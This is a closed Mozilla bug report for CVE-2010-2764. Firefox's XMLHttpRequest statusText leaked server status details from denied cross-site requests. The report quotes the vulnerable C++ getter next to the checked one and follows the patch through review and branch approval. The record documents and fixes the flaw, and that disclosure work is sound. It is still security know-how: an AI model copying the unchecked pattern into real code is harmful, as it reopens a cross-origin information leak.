Closed Bug 552090 (CVE-2010-2764) Opened 14 years ago Closed 14 years ago

XHR Cross Site Status leak from xhr.statusText

Categories

(Core :: DOM: Core & HTML, defect)

defect
Not set
normal

Tracking

()

RESOLVED FIXED
Tracking Status
blocking2.0 --- final+
blocking1.9.2 --- .9+
status1.9.2 --- .9-fixed
blocking1.9.1 --- .12+
status1.9.1 --- .12-fixed

People

(Reporter: haggardii, Assigned: mrbkap)

Details

(Keywords: verified1.9.1, verified1.9.2, Whiteboard: [sg:low])

Attachments

(1 file)

User-Agent:       Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8
Build Identifier: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8

content/base/src/nsXMLHttpRequest.cpp

GetStatus() checks for a leak of status information from denied cross-site requests but GetStatusText() does not

nsXMLHttpRequest::GetStatus(PRUint32 *aStatus)
{
  *aStatus = 0;

  if (mState & XML_HTTP_REQUEST_USE_XSITE_AC) {
    // Make sure we don't leak status information from denied cross-site
    // requests.
    if (mChannel) {
      nsresult status;
      mChannel->GetStatus(&status);
      if (NS_FAILED(status)) {
        return NS_OK;
      }
    }
  }

nsXMLHttpRequest::GetStatusText(nsACString& aStatusText)
{
  nsCOMPtr<nsIHttpChannel> httpChannel = GetCurrentHttpChannel();

  aStatusText.Truncate();

  nsresult rv = NS_OK;

  if (httpChannel) {
    rv = httpChannel->GetResponseStatusText(aStatusText);
  }

  return rv;
}

Reproducible: Always
Status: UNCONFIRMED → NEW
blocking1.9.1: --- → ?
blocking1.9.2: --- → ?
blocking2.0: --- → ?
Component: Security → DOM
Ever confirmed: true
Product: Firefox → Core
QA Contact: firefox → general
Whiteboard: [sg:high]
Attached patch FixSplinter Review
The fix here is pretty trivial. sicking asked me to not throw if we didn't have an http channel because we currently don't throw at all in that case.
Assignee: nobody → mrbkap
Status: NEW → ASSIGNED
Attachment #432251 - Flags: superreview?(jst)
Attachment #432251 - Flags: review?(jonas)
Attachment #432251 - Flags: superreview?(jst) → superreview+
This should block the next branch release - please request patch approval once it's baked.
blocking1.9.2: ? → needed
http://hg.mozilla.org/mozilla-central/rev/637a23219852

I'm also lowering the severity of this. The statusText field only exposes whether or not a server exists, and there exist timing based attacks to expose the same information.

dveditz, bsterne, please tell me if I'm off base here.
Status: ASSIGNED → RESOLVED
Closed: 14 years ago
Resolution: --- → FIXED
Whiteboard: [sg:high] → [sg:low]
blocking1.9.1: ? → needed
This issue was separately reported to security@ by Nicholas B. <nberthaume@gmail.com>.

Nominating for branches.
blocking1.9.1: needed → ?
blocking1.9.2: needed → ?
OS: Mac OS X → All
Hardware: x86 → All
Attachment #432251 - Flags: approval1.9.2.8?
Attachment #432251 - Flags: approval1.9.1.12?
> The statusText field only exposes whether or not a server exists

Not quite; it can expose some details of the server's setup too.
blocking1.9.1: ? → .12+
blocking1.9.2: ? → .8+
Comment on attachment 432251 [details] [diff] [review]
Fix

Approved for 1.9.2.8 and 1.9.1.12, a=dveditz for release-drivers
Attachment #432251 - Flags: approval1.9.2.8?
Attachment #432251 - Flags: approval1.9.2.8+
Attachment #432251 - Flags: approval1.9.1.12?
Attachment #432251 - Flags: approval1.9.1.12+
Verified for 1.9.1 and 1.9.2 based on updated checked in tests.
Alias: CVE-2010-2764
blocking2.0: ? → final+
Group: core-security
Component: DOM → DOM: Core & HTML
You need to log in before you can comment on or make changes to this bug.